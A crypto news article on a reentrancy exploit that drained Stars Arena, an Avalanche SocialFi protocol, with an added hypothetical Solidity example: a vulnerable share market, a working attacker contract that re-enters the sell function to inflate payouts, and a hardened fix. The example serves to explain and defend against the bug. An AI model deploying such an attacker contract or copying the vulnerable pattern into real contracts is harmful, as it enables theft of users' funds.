A SocialFi protocol on Avalanche (AVAX) has been hit by its second attack in three days. The attackers appear to have exploited a well-known class of vulnerability, while some commentators accuse the team of an inside job.
Stars Arena attacked once again, here’s how
Stars Arena, a much-hyped SocialFi protocol on the Avalanche (AVAX) blockchain, was attacked today, October 7, 2023, at approximately 6 a.m. UTC. Aggregate losses from its liquidity could exceed 274,000 AVAX, or nearly $2.9 million, blockchain security firm PeckShield said on X.
The Stars Arena team confirmed the vulnerability and asked all of its users and Avalanche (AVAX) enthusiasts to refrain from depositing funds while an investigation is underway:
There has been a major security breach with the smart contract. We are actively checking the issue. DO NOT deposit any funds. Stay tuned for updates
The attacker abused a reentrancy bug to manipulate the price paid for a "share," the tradable in-app asset, making it possible to buy a share and then sell it back at a dramatically inflated price.
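To make the pattern concrete, here is an added example. It is hypothetical code written for this article, not the Stars Arena contract (whose source is not shown here): a simplified creator-share market whose sellShares pays the seller before updating state, an attacker contract that re-enters from receive(), and a hardened version that applies checks-effects-interactions plus a reentrancy guard. The linear price curve, the contract names and the 0.01 ether step are all assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical, simplified creator-share market used only to illustrate the
// reentrancy pattern described above. It is NOT the Stars Arena contract, and
// the linear price curve (the n-th share costs n * 0.01 ether) is an assumption.
abstract contract SharesMarketBase {
    // subject => holder => shares held
    mapping(address => mapping(address => uint256)) public sharesBalance;
    // subject => shares outstanding
    mapping(address => uint256) public sharesSupply;

    // Cost of buying `amount` shares when `supply` are already outstanding:
    // sum over i in 1..amount of (supply + i) * 0.01 ether.
    function getPrice(uint256 supply, uint256 amount) public pure returns (uint256 total) {
        for (uint256 i = 1; i <= amount; i++) {
            total += (supply + i) * 0.01 ether;
        }
    }

    function buyShares(address subject, uint256 amount) external payable {
        uint256 price = getPrice(sharesSupply[subject], amount);
        require(msg.value >= price, "insufficient payment");
        sharesBalance[subject][msg.sender] += amount;
        sharesSupply[subject] += amount;
    }

    function sellShares(address subject, uint256 amount) external virtual;
}

// Vulnerable: pays the seller BEFORE decrementing balance and supply.
contract SharesMarketVulnerable is SharesMarketBase {
    function sellShares(address subject, uint256 amount) external override {
        uint256 supply = sharesSupply[subject];
        require(sharesBalance[subject][msg.sender] >= amount, "insufficient shares");
        uint256 price = getPrice(supply - amount, amount);
        // Interaction first: a contract seller's receive() runs here and can
        // call sellShares again while supply and balance are still unchanged,
        // so every nested sale is priced off the stale, higher supply.
        (bool ok, ) = msg.sender.call{value: price}("");
        require(ok, "payout failed");
        sharesBalance[subject][msg.sender] -= amount;
        sharesSupply[subject] -= amount;
    }
}

// Attacker: buys n shares, then sells them one at a time by re-entering from
// receive(), so each of the n sales is paid at the price of the top of the curve
// instead of walking back down it.
contract Reenterer {
    SharesMarketVulnerable public immutable market;
    address public immutable subject;
    uint256 private pending;

    constructor(SharesMarketVulnerable m, address s) {
        market = m;
        subject = s;
    }

    function attack(uint256 n) external payable {
        market.buyShares{value: msg.value}(subject, n);
        pending = n;
        market.sellShares(subject, 1);
    }

    receive() external payable {
        pending -= 1;
        if (pending > 0) market.sellShares(subject, 1); // re-enter before state update
    }

    function withdraw() external {
        payable(msg.sender).transfer(address(this).balance);
    }
}

// Hardened: reentrancy guard plus checks-effects-interactions.
contract SharesMarketHardened is SharesMarketBase {
    uint256 private locked = 1;

    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    function sellShares(address subject, uint256 amount) external override nonReentrant {
        require(amount > 0, "zero amount");
        uint256 supply = sharesSupply[subject];
        require(sharesBalance[subject][msg.sender] >= amount, "insufficient shares");
        uint256 price = getPrice(supply - amount, amount);
        // Effects before interaction: storage is final before any external code runs.
        sharesBalance[subject][msg.sender] -= amount;
        sharesSupply[subject] = supply - amount;
        (bool ok, ) = msg.sender.call{value: price}("");
        require(ok, "payout failed");
    }
}
```

Worked through with the assumed curve: if 10 shares of a subject are already outstanding and the attacker buys 10 more, it pays (11 + 12 + ... + 20) * 0.01 = 1.55 ether. An honest sale of those 10 shares would return the same 1.55 ether. Through the reentrant loop every one of the 10 sales is priced at supply 20, so the attacker is paid 10 * 20 * 0.01 = 2.0 ether, and the extra 0.45 ether comes from other holders' deposits. Against SharesMarketHardened the nested call hits the guard and the whole transaction reverts; even without the guard, the balance and supply have already been decremented when receive() runs, so the re-entered sale is priced correctly. The `amount > 0` check is ordinary input hardening, not a claim about what Stars Arena's contract did.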
It is also worth noting that two days ago, shortly after its launch, the Avalanche-based SocialFi protocol had already been drained of over $1 million. As U.Today previously reported, those attackers were able to redeem zero shares for "real" AVAX payments.
Both key figures in the Avalanche (AVAX) ecosystem and representatives of the Stars Arena team emphasized that, because of the attack's gas inefficiency, it was less dangerous than it could have been.
Community angry: “Reentry attack in 2023?”
However, as it happened amid the “SocialFi frenzy” sparked by the success of Friend.tech, the Stars Arena drama caused quite a stir in the Web3 community.
Many X commenters pointed out that reentrancy attacks are a well-known malicious technique, previously used for price manipulation in DeFi:
The reentry issue is an old and classic attack; it should be checked first. I don’t understand why SA falls into such a stupid mistake.
Others blame the team itself, arguing that parts of the contract appear unnecessarily "vulnerable."
In 2022, the same attack pattern caused an $80 million loss in the Rari/Fei exploit, as U.Today reported. The infamous 2016 DAO hack also used this method to drain Ethereum (ETH) funds.